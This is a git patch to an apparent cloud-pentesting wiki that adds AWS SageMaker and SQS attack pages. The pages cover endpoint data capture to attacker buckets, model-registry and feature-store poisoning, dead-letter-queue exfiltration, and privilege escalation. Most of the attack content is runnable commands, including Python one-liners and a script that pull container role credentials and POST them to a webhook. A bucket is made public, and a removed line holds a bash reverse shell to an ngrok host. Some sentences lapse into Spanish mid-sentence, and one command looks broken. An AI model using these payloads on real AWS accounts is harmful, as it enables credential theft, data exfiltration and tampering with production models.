From 1719f8ed3cdca79b30554ef1bc5144b01b5e9e27 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Mon, 13 Oct 2025 22:42:54 +0200 Subject: [PATCH] f --- src/SUMMARY.md | 3 +- .../aws-sagemaker-post-exploitation/README.md | 91 ++++++-- .../feature-store-poisoning.md | 53 +++++ .../aws-sqs-dlq-redrive-exfiltration.md | 160 +++++++++++++ .../aws-sagemaker-privesc/README.md | 221 +++++++++++++----- .../aws-services/aws-sagemaker-enum/README.md | 218 +++++++++++++++++ .../README.md} | 4 +- 7 files changed, 679 insertions(+), 71 deletions(-) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md rename src/pentesting-cloud/aws-security/{aws-services/aws-sagemaker-unauthorized-access.md => aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md} (97%) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index d64cbade1..3082cb521 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -396,7 +396,7 @@ - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) - [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) - - [AWS - SageMaker Unauthorized Access](pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md) + - [AWS - SageMaker Enum](pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md) - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) @@ -428,6 +428,7 @@ - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum/README.md) - [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum/README.md) - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum/README.md) + - [AWS - SageMaker Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md) - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum/README.md) - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md) - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum/README.md) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md index 50a3af3e5..4dea41206 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md @@ -7,15 +7,15 @@ Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions. ### Requirements -- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint -- S3: s3:CreateBucket (or use an existing bucket in the same account) -- Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK +- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint` +- S3: `s3:CreateBucket` (or use an existing bucket in the same account) +- Optional (if using SSE‑KMS): `kms:Encrypt` on the chosen CMK - Target: An existing InService real‑time endpoint in the same account/region ### Steps 1) Identify an InService endpoint and gather current production variants -``` +```bash REGION=${REGION:-us-east-1} EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text) echo "Endpoint=$EP" @@ -26,7 +26,7 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name " 2) Prepare attacker S3 destination for captures -``` +```bash ACC=$(aws sts get-caller-identity --query Account --output text) BUCKET=ht-sm-capture-$ACC-$(date +%s) aws s3 mb s3://$BUCKET --region $REGION @@ -36,7 +36,7 @@ aws s3 mb s3://$BUCKET --region $REGION Note: Use explicit content types that satisfy CLI validation. -``` +```bash NEWCFG=${CFG}-dc cat > /tmp/dc.json << JSON { @@ -62,14 +62,14 @@ aws sagemaker create-endpoint-config \ 4) Apply the new config with a rolling update (minimal/no downtime) -``` +```bash aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG" aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP" ``` 5) Generate at least one inference call (optional if live traffic exists) -``` +```bash echo '{"inputs":[1,2,3]}' > /tmp/payload.json aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \ --content-type application/json --accept application/json \ @@ -78,7 +78,7 @@ aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \ 6) Validate captures in attacker S3 -``` +```bash aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize ``` @@ -92,14 +92,14 @@ aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container. ### Requirements -- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint +- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint` - S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy) - Target: An InService endpoint where asynchronous invocations are (or will be) used ### Steps 1) Gather current ProductionVariants from the target endpoint -``` +```bash REGION=${REGION:-us-east-1} EP= CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text) @@ -108,7 +108,7 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name " 2) Create an attacker bucket (ensure the model execution role can PutObject to it) -``` +```bash ACC=$(aws sts get-caller-identity --query Account --output text) BUCKET=ht-sm-async-exfil-$ACC-$(date +%s) aws s3 mb s3://$BUCKET --region $REGION || true @@ -116,7 +116,7 @@ aws s3 mb s3://$BUCKET --region $REGION || true 3) Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket -``` +```bash NEWCFG=${CUR_CFG}-async-exfil cat > /tmp/async_cfg.json << JSON {"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}} @@ -128,7 +128,7 @@ aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP" 4) Trigger an async invocation and verify objects land in attacker S3 -``` +```bash aws s3 cp /etc/hosts s3://$BUCKET/inp.bin aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true sleep 30 @@ -139,4 +139,65 @@ aws s3 ls s3://$BUCKET/async-fail/ --recursive || true ### Impact - Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime. -{{#include ../../../../banners/hacktricks-training.md}} + +## SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved) + +If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy. + +### Requirements +- IAM (minimum to poison an existing group): `sagemaker:CreateModelPackage` on the target ModelPackageGroup +- Optional (to create a group if one doesn’t exist): `sagemaker:CreateModelPackageGroup` +- S3: Read access to referenced ModelDataUrl (or host attacker-controlled artifacts) +- Target: A Model Package Group that downstream automation watches for Approved versions + +### Steps +1) Set region and create/find a target Model Package Group +```bash +REGION=${REGION:-us-east-1} +MPG=victim-group-$(date +%s) +aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group" +``` + +2) Prepare dummy model data in S3 +```bash +ACC=$(aws sts get-caller-identity --query Account --output text) +BUCKET=ht-sm-mpkg-$ACC-$(date +%s) +aws s3 mb s3://$BUCKET --region $REGION +head -c 1024 /tmp/model.tar.gz +aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION +``` + +3) Register a malicious (here benign) Approved model package version referencing a public AWS DLC image +```bash +IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3" +cat > /tmp/inf.json << JSON +{ + "Containers": [ + { + "Image": "$IMG", + "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz" + } + ], + "SupportedContentTypes": ["text/csv"], + "SupportedResponseMIMETypes": ["text/csv"] +} +JSON +aws sagemaker create-model-package --region $REGION --model-package-group-name $MPG --model-approval-status Approved --inference-specification file:///tmp/inf.json +``` + +4) Verify the new Approved version exists +```bash +aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table +``` + +### Impact +- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles. +- With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account. + +## Feature store poisoning + +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints. + +{{#ref}} +feature-store-poisoning.md +{{/ref}} \ No newline at end of file diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md new file mode 100644 index 000000000..153174d9c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md @@ -0,0 +1,53 @@ +# SageMaker Feature Store online store poisoning + +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints. + +## Requirements +- Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` +- Target: Feature Group with OnlineStore enabled (typically backing real-time inference) + +## Steps +1) Pick or create a small Online Feature Group for testing +```bash +REGION=${REGION:-us-east-1} +FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) +if [ -z "$FG" -o "$FG" = "None" ]; then + ACC=$(aws sts get-caller-identity --query Account --output text) + FG=ht-fg-$ACC-$(date +%s) + ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) + aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" + echo "Waiting for feature group to be in Created state..." + for i in $(seq 1 40); do + ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) + echo $ST; [ "$ST" = "Created" ] && break; sleep 15 + done +fi +``` + +2) Insert/overwrite an online record (poison) +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) +cat > /tmp/put.json << JSON +{ + "FeatureGroupName": "$FG", + "Record": [ + {"FeatureName": "entity_id", "ValueAsString": "user-123"}, + {"FeatureName": "event_time", "ValueAsString": "$NOW"}, + {"FeatureName": "risk_score", "ValueAsString": "0.99"} + ], + "TargetStores": ["OnlineStore"] +} +JSON +aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json +``` + +3) Read back the record to confirm manipulation +```bash +aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" +``` + +Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models. + +## Impact +- Real-time integrity attack: manipulate features used by production models without touching endpoints/models. +- Confidentiality risk: read sensitive features via GetRecord from OnlineStore. diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md new file mode 100644 index 000000000..c915912ec --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md @@ -0,0 +1,160 @@ +# AWS – SQS DLQ Redrive Exfiltration via StartMessageMoveTask + +## Description + +Abuse SQS message move tasks to steal all accumulated messages from a victim's Dead-Letter Queue (DLQ) by redirecting them to an attacker-controlled queue using `sqs:StartMessageMoveTask`. This technique exploits AWS's legitimate message recovery feature to exfiltrate sensitive data that has accumulated in DLQs over time. + +## What is a Dead-Letter Queue (DLQ)? + +A Dead-Letter Queue is a special SQS queue where messages are automatically sent when they fail to be processed successfully by the main application. These failed messages often contain: +- Sensitive application data that couldn't be processed +- Error details and debugging information +- Personal Identifiable Information (PII) +- API tokens, credentials, or other secrets +- Business-critical transaction data + +DLQs act as a "graveyard" for failed messages, making them valuable targets since they accumulate sensitive data over time that applications couldn't handle properly. + +## Attack Scenario + +**Real-world example:** +1. **E-commerce application** processes customer orders through SQS +2. **Some orders fail** (payment issues, inventory problems, etc.) and get moved to a DLQ +3. **DLQ accumulates** weeks/months of failed orders containing customer data: `{"customerId": "12345", "creditCard": "4111-1111-1111-1111", "orderTotal": "$500"}` +4. **Attacker gains access** to AWS credentials with SQS permissions +5. **Attacker discovers** the DLQ contains thousands of failed orders with sensitive data +6. **Instead of trying to access individual messages** (slow and obvious), attacker uses `StartMessageMoveTask` to bulk transfer ALL messages to their own queue +7. **Attacker extracts** all historical sensitive data in one operation + +## Requirements +- The source queue must be configured as a DLQ (referenced by at least one queue RedrivePolicy). +- IAM permissions (run as the compromised victim principal): + - On DLQ (source): `sqs:StartMessageMoveTask`, `sqs:GetQueueAttributes`. + - On destination queue: permission to deliver messages (e.g., queue policy allowing `sqs:SendMessage` from the victim principal). For same-account destinations this is typically allowed by default. + - If SSE-KMS is enabled: on source CMK `kms:Decrypt`, and on destination CMK `kms:GenerateDataKey`, `kms:Encrypt`. + +## Impact +Exfiltrate sensitive payloads accumulated in DLQs (failed events, PII, tokens, application payloads) at high speed using native SQS APIs. Works cross-account if the destination queue policy allows `SendMessage` from the victim principal. + +## How to Abuse + +- Identify the victim DLQ ARN and ensure it is actually referenced as a DLQ by some queue (any queue is fine). +- Create or choose an attacker-controlled destination queue and get its ARN. +- Start a message move task from the victim DLQ to your destination queue. +- Monitor progress or cancel if needed. + +### CLI Example: Exfiltrating Customer Data from E-commerce DLQ + +**Scenario**: An attacker has compromised AWS credentials and discovered that an e-commerce application uses SQS with a DLQ containing failed customer order processing attempts. + +1) **Discover and examine the victim DLQ** + +```bash +# List queues to find DLQs (look for names containing 'dlq', 'dead', 'failed', etc.) +aws sqs list-queues --queue-name-prefix dlq + +# Let's say we found: https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq +VICTIM_DLQ_URL="https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq" +SRC_ARN=$(aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" --attribute-names QueueArn --query Attributes.QueueArn --output text) + +# Check how many messages are in the DLQ (potential treasure trove!) +aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" \ + --attribute-names ApproximateNumberOfMessages +# Output might show: "ApproximateNumberOfMessages": "1847" +``` + +2) **Create attacker-controlled destination queue** + +```bash +# Create our exfiltration queue +ATTACKER_Q_URL=$(aws sqs create-queue --queue-name hacker-exfil-$(date +%s) --query QueueUrl --output text) +ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --attribute-names QueueArn --query Attributes.QueueArn --output text) + +echo "Created exfiltration queue: $ATTACKER_Q_ARN" +``` + +3) **Execute the bulk message theft** + +```bash +# Start moving ALL messages from victim DLQ to our queue +# This operation will transfer thousands of failed orders containing customer data +echo "Starting bulk exfiltration of $SRC_ARN to $ATTACKER_Q_ARN" +TASK_RESPONSE=$(aws sqs start-message-move-task \ + --source-arn "$SRC_ARN" \ + --destination-arn "$ATTACKER_Q_ARN" \ + --max-number-of-messages-per-second 100) + +echo "Move task started: $TASK_RESPONSE" + +# Monitor the theft progress +aws sqs list-message-move-tasks --source-arn "$SRC_ARN" --max-results 10 +``` + +4) **Harvest the stolen sensitive data** + +```bash +# Receive the exfiltrated customer data +echo "Receiving stolen customer data..." +aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \ + --attribute-names All --message-attribute-names All \ + --max-number-of-messages 10 --wait-time-seconds 5 + +# Example of what an attacker might see: +# { +# "Body": "{\"customerId\":\"cust_12345\",\"email\":\"john@example.com\",\"creditCard\":\"4111-1111-1111-1111\",\"orderTotal\":\"$299.99\",\"failureReason\":\"Payment declined\"}", +# "MessageId": "12345-abcd-6789-efgh" +# } + +# Continue receiving all messages in batches +while true; do + MESSAGES=$(aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \ + --max-number-of-messages 10 --wait-time-seconds 2 --output json) + + if [ "$(echo "$MESSAGES" | jq '.Messages | length')" -eq 0 ]; then + echo "No more messages - exfiltration complete!" + break + fi + + echo "Received batch of stolen data..." + # Process/save the stolen customer data + echo "$MESSAGES" >> stolen_customer_data.json +done +``` + +### Cross-account notes +- The destination queue must have a resource policy allowing the victim principal to `sqs:SendMessage` (and, if used, KMS grants/permissions). + +## Why This Attack is Effective + +1. **Legitimate AWS Feature**: Uses built-in AWS functionality, making it hard to detect as malicious +2. **Bulk Operation**: Transfers thousands of messages quickly instead of slow individual access +3. **Historical Data**: DLQs accumulate sensitive data over weeks/months +4. **Under the Radar**: Many organizations don't monitor DLQ access closely +5. **Cross-Account Capable**: Can exfiltrate to attacker's own AWS account if permissions allow + +## Detection and Prevention + +### Detection +Monitor CloudTrail for suspicious `StartMessageMoveTask` API calls: +```json +{ + "eventName": "StartMessageMoveTask", + "sourceIPAddress": "suspicious-ip", + "userIdentity": { + "type": "IAMUser", + "userName": "compromised-user" + }, + "requestParameters": { + "sourceArn": "arn:aws:sqs:us-east-1:123456789012:sensitive-dlq", + "destinationArn": "arn:aws:sqs:us-east-1:attacker-account:exfil-queue" + } +} +``` + +### Prevention +1. **Least Privilege**: Restrict `sqs:StartMessageMoveTask` permissions to only necessary roles +2. **Monitor DLQs**: Set up CloudWatch alarms for unusual DLQ activity +3. **Cross-Account Policies**: Carefully review SQS queue policies allowing cross-account access +4. **Encrypt DLQs**: Use SSE-KMS with restricted key policies +5. **Regular Cleanup**: Don't let sensitive data accumulate in DLQs indefinitely + diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md index c6e0080dc..39768270c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md @@ -37,79 +37,175 @@ aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name .dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ - --role-arn +REGION= +ROLE_ARN= +IMAGE=683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3 +ENV='{"W":"https://example.com/webhook"}' -# In my tests it took 10min to receive the shell -curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds +aws sagemaker create-processing-job \ + --processing-job-name privescjob \ + --processing-resources '{"ClusterConfig":{"InstanceCount":1,"InstanceType":"ml.t3.medium","VolumeSizeInGB":50}}' \ + --app-specification "{\"ImageUri\":\"$IMAGE\",\"ContainerEntrypoint\":[\"python\",\"-c\"],\"ContainerArguments\":[\"import os,urllib.request as u;m=os.environ.get('AWS_CONTAINER_CREDENTIALS_RELATIVE_URI');m and u.urlopen(os.environ['W'],data=u.urlopen('http://169.254.170.2'+m).read())\"]}" \ + --environment "$ENV" \ + --role-arn $ROLE_ARN + +# Las credenciales llegan al webhook indicado. Asegúrate de que el rol tenga permisos ECR (AmazonEC2ContainerRegistryReadOnly) para descargar la imagen. ``` **Potential Impact:** Privesc to the sagemaker service role specified. ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. - -> [!WARNING] -> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). -> -> ```bash -> # Create docker image -> mkdir /tmp/rev -> ## Note that the trainning job is going to call an executable called "train" -> ## That's why I'm putting the rev shell in /bin/train -> ## Set the values of and -> cat > /tmp/rev/Dockerfile < FROM ubuntu -> RUN apt update && apt install -y ncat curl -> RUN printf '#!/bin/bash\nncat -e /bin/sh' > /bin/train -> RUN chmod +x /bin/train -> CMD ncat -e /bin/sh -> EOF -> -> cd /tmp/rev -> sudo docker build . -t reverseshell -> -> # Upload it to ECR -> sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ -> sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest -> sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest -> ``` +An attacker with those permissions can launch a training job that ejecuta código arbitrario con el rol indicado. Usando un contenedor oficial de SageMaker y sobreescribiendo el entrypoint con un payload inline, no necesitas construir imágenes propias: ```bash -# Create trainning job with the docker image created -aws sagemaker create-training-job \ - --training-job-name privescjob \ - --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ - --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ - --role-arn \ - --output-data-config '{"S3OutputPath": "s3://"}' \ - --stopping-condition '{"MaxRuntimeInSeconds": 600}' +REGION= +ROLE_ARN= +IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310 +ENV='{"W":"https://example.com/webhook"}' +OUTPUT_S3=s3:///training-output/ +# El rol debe poder leer imágenes de ECR (p.e. AmazonEC2ContainerRegistryReadOnly) y escribir en OUTPUT_S3. -#To get the creds -curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer +aws sagemaker create-training-job \ + --training-job-name privesc-train \ + --role-arn $ROLE_ARN \ + --algorithm-specification "{\"TrainingImage\":\"$IMAGE\",\"TrainingInputMode\":\"File\",\"ContainerEntrypoint\":[\"python\",\"-c\"],\"ContainerArguments\":[\"import os,urllib.request as u;m=os.environ.get('AWS_CONTAINER_CREDENTIALS_RELATIVE_URI');m and u.urlopen(os.environ['W'],data=u.urlopen('http://169.254.170.2'+m).read())\"]}" \ + --output-data-config "{\"S3OutputPath\":\"$OUTPUT_S3\"}" \ + --resource-config '{"InstanceCount":1,"InstanceType":"ml.m5.large","VolumeSizeInGB":50}' \ + --stopping-condition '{"MaxRuntimeInSeconds":600}' \ + --environment "$ENV" + +# El payload se ejecuta en cuanto el job pasa a InProgress y exfiltra las credenciales del rol. ``` -**Potential Impact:** Privesc to the sagemaker service role specified. +**Potential Impact:** Privesc to the SageMaker service role specified. ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` -An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ -_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. Script mode requires hosting the payload in S3, but all steps pueden automatizarse desde la CLI: + +```bash +REGION= +ROLE_ARN= +BUCKET=sm-hpo-privesc-$(date +%s) +aws s3 mb s3://$BUCKET --region $REGION + +# Allow public reads so any SageMaker role can pull the code +aws s3api put-public-access-block \ + --bucket $BUCKET \ + --public-access-block-configuration '{ + "BlockPublicAcls": false, + "IgnorePublicAcls": false, + "BlockPublicPolicy": false, + "RestrictPublicBuckets": false + }' + +aws s3api put-bucket-policy --bucket $BUCKET --policy "{ + \"Version\": \"2012-10-17\", + \"Statement\": [ + { + \"Effect\": \"Allow\", + \"Principal\": \"*\", + \"Action\": \"s3:GetObject\", + \"Resource\": \"arn:aws:s3:::$BUCKET/*\" + } + ] +}" + +cat <<'EOF' > /tmp/train.py +import os, time, urllib.request + +def main(): + meta = os.environ.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI") + if not meta: + return + creds = urllib.request.urlopen(f"http://169.254.170.2{meta}").read() + req = urllib.request.Request( + "https://example.com/webhook", + data=creds, + headers={"Content-Type": "application/json"} + ) + urllib.request.urlopen(req) + print("train:loss=0") + time.sleep(300) + +if __name__ == "__main__": + main() +EOF + +cd /tmp +tar -czf code.tar.gz train.py +aws s3 cp code.tar.gz s3://$BUCKET/code/train-code.tar.gz --region $REGION --acl public-read + +echo "dummy" > /tmp/input.txt +aws s3 cp /tmp/input.txt s3://$BUCKET/input/dummy.txt --region $REGION --acl public-read + +IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310 +CODE_S3=s3://$BUCKET/code/train-code.tar.gz +TRAIN_INPUT_S3=s3://$BUCKET/input +OUTPUT_S3=s3://$BUCKET/output +# El rol necesita permisos ECR y escritura en el bucket. + +cat > /tmp/hpo-definition.json < \ --user-settings ExecutionRole=$ROLE_ARN -# 3) Verify the role change took effect aws sagemaker describe-user-profile \ --domain-id \ --user-profile-name \ --query 'UserSettings.ExecutionRole' --output text -# 4) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role +# 3) If the tenant uses Studio Spaces, swap the ExecutionRole at the space level +aws sagemaker update-space \ + --domain-id \ + --space-name \ + --space-settings ExecutionRole=$ROLE_ARN + +aws sagemaker describe-space \ + --domain-id \ + --space-name \ + --query 'SpaceSettings.ExecutionRole' --output text + +# 4) Optionally, change the domain default so every profile inherits the new role +aws sagemaker update-domain \ + --domain-id \ + --default-user-settings ExecutionRole=$ROLE_ARN + +aws sagemaker describe-domain \ + --domain-id \ + --query 'DefaultUserSettings.ExecutionRole' --output text + +# 5) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role aws sagemaker create-app \ --domain-id \ --user-profile-name \ diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md new file mode 100644 index 000000000..8767144ba --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md @@ -0,0 +1,218 @@ +# AWS - SageMaker Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Service Overview + +Amazon SageMaker is AWS' managed machine-learning platform that glues together notebooks, training infrastructure, orchestration, registries, and managed endpoints. A compromise of SageMaker resources typically provides: + +- Long-lived IAM execution roles with broad S3, ECR, Secrets Manager, or KMS access. +- Access to sensitive datasets stored in S3, EFS, or inside feature stores. +- Network footholds inside VPCs (Studio apps, training jobs, endpoints). +- High-privilege presigned URLs that bypass console authentication. + +Understanding how SageMaker is assembled is key before you pivot, persist, or exfiltrate data. + +## Core Building Blocks + +- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Each domain has a shared EFS file system and default execution role. +- **Notebook Instances**: Managed EC2 instances for standalone notebooks; use separate execution roles. +- **Training / Processing / Transform Jobs**: Ephemeral containers that pull code from ECR and data from S3. +- **Pipelines & Experiments**: Orchestrated workflows that describe all steps, inputs, and outputs. +- **Models & Endpoints**: Packaged artefacts deployed for inference via HTTPS endpoints. +- **Feature Store & Data Wrangler**: 